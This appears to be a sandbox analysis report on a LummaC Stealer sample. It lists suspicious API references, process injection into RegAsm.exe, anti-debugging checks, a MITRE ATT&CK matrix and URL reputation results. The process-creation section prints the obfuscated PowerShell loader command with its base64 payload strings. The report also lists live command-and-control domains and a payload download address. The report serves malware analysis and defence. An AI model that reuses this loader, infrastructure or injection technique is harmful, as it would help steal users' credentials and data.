Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C09879 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00C09879

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.file.exe.88e2000.3.raw.unpack, Interop.cs	Reference to suspicious API methods: Kernel32.VirtualAlloc(P_0, P_1, P_2, P_3)
Source: 0.2.file.exe.90b5000.6.raw.unpack, ProcessManager.cs	Reference to suspicious API methods: Interop.Kernel32.OpenProcess(1052672, false, P_0)
Source: 1.2.powershell.exe.71c0000.4.raw.unpack, HamerPush.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 1.2.powershell.exe.71c0000.4.raw.unpack, HamerPush.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs

Jump to dropped file

Contains functionality to prevent local Windows debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007623F0 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode,

0_2_007623F0

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ptramidermsnqj.shop

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B3C008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt = 'rrqcwf6yfelfaitjspp5lem05xycdtlsxmdjvxtj1qg=' $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9 = '6ixk6qxmw723jyolklhrjq==' $g3idvvq10uz3mjgooc4lurmdlmagvku1dwo8qdt8frkfzgftpg9ntzzpg4rjvjfq0yz14ixkiwfcghof6gqfbgiewzrmlkmwm3p1qoyhjyevtvi9qmmptzfjplffrlzykj0crmoshjwmcluyhr5yxwcmo5b4itq7zgckwfi3yu7932he1gyzfaan6dowktkytyn5ijcb = 'wbvnouxfi5vdhfvlh8vlflqchp99av7e98o0gkg8brhdo82kvbrzpwvpfobxukseh2pcy+l2tcyjfehidtsgghj2bjvred6jn8ymda6pagitivcfaadhriyf6jzmgsg3g8ujc89m0/qyyyad5suzy09/c7hnokp6opvyqwarjowkpo0fjsugtyh9z0izltmfdqlmyrsbjoiyerwb+umgbe9s1hbis2rxnopewvfau7p8cq6jxhs8x8aueu9yx+vbq6oczgsu/boli7fal5ubebcal8sg53utsrbzm7gdvntm0rtidox3ud/axb3htk3owmx9s1hpe4frmpvy2+fvssneucuaqkthljrkwytzlgi=' function 9b0dzdtvy7cbvqsofpdtrvtejjgffbvsem0dkxy3u1xdqi2c6y0t6jumiltpxngmbkwi0odi1jypygyagd8glclw2nvydiggllb5mtcrursvk4ncxi9jfzazzagnto5tdrenfsyvaqvukybxzsbu8v1lab6bdzyfm8ts0ax5umjydgpazjo0nakg0sddwmjbsqhlfi6p ($mko9yvaier8nddieobdsiqsaoi7oy0teepajbrja8lvawcuofu4f6lmwrowqolkdxt8y2ycxscux4rflnjidvditcorx62lm0ic235whrhx31pq09jcfdgiukfvngfrpr76mpmhixbvnpe1my1ov0fjuzihnjhabq8lujebv1ui1juefn9pfq5zcnlmg5t8pak7g27dt, $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt, $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) { $56avddiumwbta7sloc2iwkj72hfx8e4rmzvhaxdxjjqzkpakywv2pyslvct6xlwi1uhbckk19fyntkvdgwzchcbngjwx37zyxixqhzinlvtk0esbgqzcmjazsu42pmxbf9pkm55hmlqmirx2rjrnhncei87nufx8xs4qohoklizasnr07clfvkurwlcnyrm7yrpqv6dj = [convert]::frombase64string($keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt) $vg1zyclurggs4sdnycud5am4vscbybeaybkos43u0iwraucgdbrkcaduux35aj5qcf33hou3i9nnewtbq5xmjtyyxpuwbytqmfou19yohobcnqg9d2f4mi7irefru92kqxay6y9q7ifuiwb7jwr8soe4ifdv3guhv0lpphcesyxdcdav38h9rts1tgq1wnnqoy7s9lr2 = [convert]::frombase64string($q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) $tngurar4fhsv8wq38uwiqaifbgpefhviqfqemxaspwweussthejpoibi4bsllnzxwketflqaket4peuiov6bygtid7alfogbwytjoyownj5joh3zgaxpgxzoq6p7levvyr7qlk4zhknobktwek5er0w89eth9
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt = 'rrqcwf6yfelfaitjspp5lem05xycdtlsxmdjvxtj1qg=' $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9 = '6ixk6qxmw723jyolklhrjq==' $g3idvvq10uz3mjgooc4lurmdlmagvku1dwo8qdt8frkfzgftpg9ntzzpg4rjvjfq0yz14ixkiwfcghof6gqfbgiewzrmlkmwm3p1qoyhjyevtvi9qmmptzfjplffrlzykj0crmoshjwmcluyhr5yxwcmo5b4itq7zgckwfi3yu7932he1gyzfaan6dowktkytyn5ijcb = 'wbvnouxfi5vdhfvlh8vlflqchp99av7e98o0gkg8brhdo82kvbrzpwvpfobxukseh2pcy+l2tcyjfehidtsgghj2bjvred6jn8ymda6pagitivcfaadhriyf6jzmgsg3g8ujc89m0/qyyyad5suzy09/c7hnokp6opvyqwarjowkpo0fjsugtyh9z0izltmfdqlmyrsbjoiyerwb+umgbe9s1hbis2rxnopewvfau7p8cq6jxhs8x8aueu9yx+vbq6oczgsu/boli7fal5ubebcal8sg53utsrbzm7gdvntm0rtidox3ud/axb3htk3owmx9s1hpe4frmpvy2+fvssneucuaqkthljrkwytzlgi=' function 9b0dzdtvy7cbvqsofpdtrvtejjgffbvsem0dkxy3u1xdqi2c6y0t6jumiltpxngmbkwi0odi1jypygyagd8glclw2nvydiggllb5mtcrursvk4ncxi9jfzazzagnto5tdrenfsyvaqvukybxzsbu8v1lab6bdzyfm8ts0ax5umjydgpazjo0nakg0sddwmjbsqhlfi6p ($mko9yvaier8nddieobdsiqsaoi7oy0teepajbrja8lvawcuofu4f6lmwrowqolkdxt8y2ycxscux4rflnjidvditcorx62lm0ic235whrhx31pq09jcfdgiukfvngfrpr76mpmhixbvnpe1my1ov0fjuzihnjhabq8lujebv1ui1juefn9pfq5zcnlmg5t8pak7g27dt, $keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt, $q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) { $56avddiumwbta7sloc2iwkj72hfx8e4rmzvhaxdxjjqzkpakywv2pyslvct6xlwi1uhbckk19fyntkvdgwzchcbngjwx37zyxixqhzinlvtk0esbgqzcmjazsu42pmxbf9pkm55hmlqmirx2rjrnhncei87nufx8xs4qohoklizasnr07clfvkurwlcnyrm7yrpqv6dj = [convert]::frombase64string($keaiuuybvmghwl9jc2uvebvvdx4qcwlvjmmbpdvk4z9hadgmpvlr3mrire5607yablyjzxt8gksecfw9qragku16wdua8pjxa9fpfxnsbclsumgbtwpjwhpgt1oldtaq0ve2963t4sf8iimi7irb9aasjz5ejbeicusz7dbn3wfdcrykofovbygpuwjkapk2dwvnqnbt) $vg1zyclurggs4sdnycud5am4vscbybeaybkos43u0iwraucgdbrkcaduux35aj5qcf33hou3i9nnewtbq5xmjtyyxpuwbytqmfou19yohobcnqg9d2f4mi7irefru92kqxay6y9q7ifuiwb7jwr8soe4ifdv3guhv0lpphcesyxdcdav38h9rts1tgq1wnnqoy7s9lr2 = [convert]::frombase64string($q2ufwrafdba9sullj9h7r4q8l3qzvycg66pyatf5bh3ttyxqzm7t05bwbvt31bipytdl5vkpubwaawom6az9qjqa43moameayovzvllcchyo91wfh6wqbiypdcrb9wpi7vbmborwpvxik11dihg3pnzqpgmstkcgsqqdp8dsfbbolp4maos2pv2t6lwwcy1ftrq4knn9) $tngurar4fhsv8wq38uwiqaifbgpefhviqfqemxaspwweussthejpoibi4bsllnzxwketflqaket4peuiov6bygtid7alfogbwytjoyownj5joh3zgaxpgxzoq6p7levvyr7qlk4zhknobktwek5er0w89eth9			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00BD6690 cpuid

0_2_00BD6690

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009AC080 CreateNamedPipeA,GetLastError,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,CreateEventW,GetLastError,ConnectNamedPipe,GetLastError,

0_2_009AC080

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A2F090 GetProcessHeap,HeapAlloc,GetSystemTimeAsFileTime,QueryPerformanceCounter,GetProcessHeap,HeapAlloc,

0_2_00A2F090

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	22 Command and Scripting Interpreter	1 DLL Side-Loading	412 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	412 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	8%	ReversingLabs	Win32.Malware.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://help.steampowered.com/	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
http://crl.microsoft	0%	Avira URL Cloud	safe
http://147.45.44.131/files/gqgqg.exe	0%	Avira URL Cloud	safe
reinforcenh.shop	100%	Avira URL Cloud	malware
stogeneratmns.shop	100%	Avira URL Cloud	malware
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://gutterydhowi.shop/api	100%	Avira URL Cloud	malware
https://drawzhotdog.shop/api	100%	Avira URL Cloud	malware
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	0%	Avira URL Cloud	safe
https://aka.ms/dotnet/app-launch-failed	0%	Avira URL Cloud	safe
https://s.yu	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
https://ballotnwu.site/apiQ	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/	100%	Avira URL Cloud	malware
https://recaptcha.net/recaptcha/	0%	Avira URL Cloud	safe
https://aka.ms/dotnet-illink/com)	0%	Avira URL Cloud	safe
https://www.youtube.com	0%	Avira URL Cloud	safe
https://github.com/dotnet/runtime	0%	Avira URL Cloud	safe
https://aka.ms/dotnet/infopath-to-application:Usage:	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
https://ghostreedmnu.shop/apiB	100%	Avira URL Cloud	malware
https://aka.ms/dotnet-warnings/	0%	Avira URL Cloud	safe
https://aka.ms/dotnet/sdk-not-foundInstall	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
ghostreedmnu.shop	100%	Avira URL Cloud	malware
https://aka.ms/nativeaot-compatibility	0%	Avira URL Cloud	safe
https://aka.ms/dotnet-core-applaunch?Path:	0%	Avira URL Cloud	safe
